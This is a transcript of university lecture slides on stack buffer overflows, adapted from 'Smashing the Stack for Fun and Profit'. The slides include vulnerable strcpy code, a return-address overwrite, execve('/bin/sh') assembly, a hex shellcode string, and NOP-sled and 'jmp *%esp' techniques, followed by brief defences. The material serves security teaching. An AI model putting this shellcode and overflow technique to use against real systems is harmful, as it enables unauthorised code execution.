Presentation is loading. Please wait.

Presentation is loading. Please wait.

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Published bySarah Gaines Modified over 9 years ago

Similar presentations

Presentation on theme: "Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)"— Presentation transcript:

1 Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

2 Course Admin HW3 being graded (solution set will be provided soon) HW4 posted – Includes programming part related to Buffer Overflow – The conceptual part due Apr 17 – Programming part needs demo – we will do so during the exam week Demo slot sign-up – next lecture – You are allowed to work on the programming part in teams of two each Please form your own team

3 Course Admin Final Exam – Apr 24 (Thursday) – 7 to 9:30pm – Venue – TBA (most likely the lecture room) Covers everything (cumulative) – 35% -- pre mid-term material – 65% -- post mid-term material Again, close-book, just like the mid-term Next week, we will do review partly Lecture 11 - Threat Modeling

4 Why study buffer overflow? Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, etc. We will focus upon static buffer overflow vulnerabilities Lecture 8 - Buffer Overflow

5 Recall the Security Life Cycle Lecture 8 - Buffer Overflow Threats Policy Specification Design Implementation Operation and Maintenance Which stage?

6 How Computer Works There is a processor that interfaces with various devices Processor executes instructions – Add, sub, mult, jump and various functions Lecture 8 - Buffer Overflow

7 Where to get the instructions from Each process “thinks” that it has 4GB (2^32) of (virtual) memory (assuming 32-bit processor) Instructions are loaded into the memory Processor fetches and executes these instructions one by one How does the processor know where to return back after “jumping” and after returning from a function Lecture 8 - Buffer Overflow

8 Process Memory Organization Lecture 8 - Buffer Overflow

9 Process Memory Organization Lecture 8 - Buffer Overflow

10 Process Memory Organization

11 Lecture 8 - Buffer Overflow Function Calls

12 Lecture 8 - Buffer Overflow Function Calls

13 Buffer Overflow: Example void function(char *str) { char buffer[8]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); } Lecture 8 - Buffer Overflow

14 Buffer Overflows Lecture 8 - Buffer Overflow

15 Buffer Overflows Lecture 8 - Buffer Overflow

16 Buffer Overflows Lecture 8 - Buffer Overflow

17 Buffer Overflows

18 Lecture 8 - Buffer Overflow Buffer Overflows

19 Lecture 8 - Buffer Overflow Buffer Overflows

20 Lecture 8 - Buffer Overflow Buffer Overflows

21 Modifying the Execution Flow Lecture 8 - Buffer Overflow void function() {char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); }

22 Lecture 8 - Buffer Overflow Modifying the Execution Flow

23 Lecture 8 - Buffer Overflow Modifying the Execution Flow

24 Lecture 8 - Buffer Overflow Modifying the Execution Flow

25 Lecture 8 - Buffer Overflow Modifying the Execution Flow

26 Exploiting Overflows - Smashing the Stack So, we can modify the flow of execution - what do we want to do now? Spawn a shell and issue commands from it Lecture 8 - Buffer Overflow

27 Exploiting Overflows - Smashing the Stack Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it

28 Exploiting Overflows - Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer! Lecture 8 - Buffer Overflow

29 Exploiting Overflows - Smashing the Stack What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

30 Spawning a Shell Lecture 8 - Buffer Overflow #include void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); }

31 Spawning a Shell Lecture 8 - Buffer Overflow void main() {__asm__(" jmp 0x2a popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebxBINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2f.string \"/bin/sh\" "); }

32 Spawning a Shell Lecture 8 - Buffer Overflow char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x 00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x8 0" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff " "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

33 How to find Shellcode Lecture 8 - Buffer Overflow 1.Guess - time consuming - being wrong by 1 byte will lead to segmentation fault or invalid instruction

34 How to find Shellcode Lecture 8 - Buffer Overflow 2. Pad shellcode with NOP’s then guess - we don’t need to be exactly on - much more efficient

35 Can we do better? If we can find the address where SP points to, we are home Lecture 8 - Buffer Overflow

36 Can we do better? Find out what shared libaries are being used by the vulnerable program – Use ldd command – This also provides the starting address where the shared libraries are stored in process’s memory Find out where in the shared library the instruction jmp *%esp occurs Add this to the starting address of the shared library At %esp, store the instruction jmp –constant offset Lecture 8 - Buffer Overflow

37 Consider the simple program Lecture 8 - Buffer Overflow

38 Stack Contents – Normal Execution Lecture 8 - Buffer Overflow

39 Stack Contents – buffer overflow Lecture 8 - Buffer Overflow

40 How to prevent buffer overflows Programmer level: – Check the length of the input Use functions strncpy (instead of strcpy) OS level: – Techniques such as address space layout randomization Lecture 8 - Buffer Overflow

41 References Smashing the Stack for Fun and Profit: http://doc.bughunter.net/buffer-overflow/smash-stack.html http://doc.bughunter.net/buffer-overflow/smash-stack.html Smashing the Modern Stack for Fun and Profit: http://netsec.cs.northwestern.edu/media/readings/modern_ stack_smashing.pdf http://netsec.cs.northwestern.edu/media/readings/modern_ stack_smashing.pdf Lecture 8 - Buffer Overflow

Download ppt "Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)"

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Buffer Overflows By Tim Peterson Joel Miller Dan Block.

Buffer Overflows By Tim Peterson Joel Miller Dan Block.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:

Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009.

Buffer Overflows Ian Kayne For School of Computer Science, University of Birmingham 16 th February 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.

Buffer Overflow Attacks. Memory plays a key part in many computer system functions. It’s a critical component to many internal operations. From mother.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec – Recitation 2 Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Similar presentations

Ads by Google